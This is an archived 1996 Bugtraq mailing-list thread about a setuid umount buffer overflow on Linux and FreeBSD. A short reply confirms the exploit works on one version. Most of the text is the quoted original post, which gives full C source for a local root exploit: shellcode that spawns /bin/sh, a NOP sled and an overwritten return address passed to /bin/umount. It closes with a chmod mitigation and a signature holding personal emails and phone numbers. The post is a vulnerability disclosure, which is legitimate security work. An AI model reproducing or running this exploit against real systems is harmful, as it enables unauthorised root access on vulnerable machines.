[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Re: Linux & BSD's umount exploit
From: Mike Bremford <Mike.Bremford () mail ! bl ! uk>
Date: 1996-10-30 18:10:27
[Download RAW message or body]
This has been fixed in 2.5m and beyond, possibly before. Works like a
dream in vanilla 2.5 though.
Thanks for the info.
Mike
______________________________ Reply Separator _________________________________
Subject: Linux & BSD's umount exploit
Author: Paulo Jorge Alves Oliveira <pjao@dux.isec.pt> at Internet
Date: 29/10/96 12:38
Hello,
there is a bug in berkeley-derived umount, which allows attacker to
get
root access (see freebsd-security for details). Here is exploit for
Linux
(tested on 2.0.XX), for BSD (tested on FreeBSD 2.1) and a quick
soluction.
Best regards, Paulo
-------------------------------------- linux_umount_exploit.c ----------
#include <stdio.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>
#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50
u_long get_esp()
{
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i;
int ofs = DEFAULT_OFFSET;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
/* fill start of buffer with nops */
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
/* stick asm code into the buffer */
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
(void)alarm((u_int)0);
execl(PATH_MOUNT, "umount", buff, NULL);
}
--------------------------------------------------------------------------
Here is a little solution --
chmod -s /bin/umount
This way only root can run this command.
With best regards, Paulo
--
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| JUST HAVE SOME FUN IN
THIS |
| CRAZY
WORLD |
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| VIRTUAL PRAXIS -> CIUNIX.UC.PT 3333 |
| IRC-PTnet -> IRC.ISEC.PT, CIUNIX.UC.PT, IRC.RCCN.NET, IRC.UALG.PT
|
| E-MAILs |
| DO DOMINIO UC : |
| pjao@ciunix.uc.pt |
| pjao@gemini.ci.uc.pt |
| DO DOMINIO ISEC : |
| pjao@dux.isec.pt |
| ircadm@irc.isec.pt (Administrador do server de IRC do ISEC) |
| WWW |
| http://ciunix.uc.pt/~pjao |
| http://dux.isec.pt/~pjao |
! TELEFONES |
| ISEC : 039-7000200 Extensao 2718 !
| BIP : 0941-7-193144 !
|___________________________________________________________________________|
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic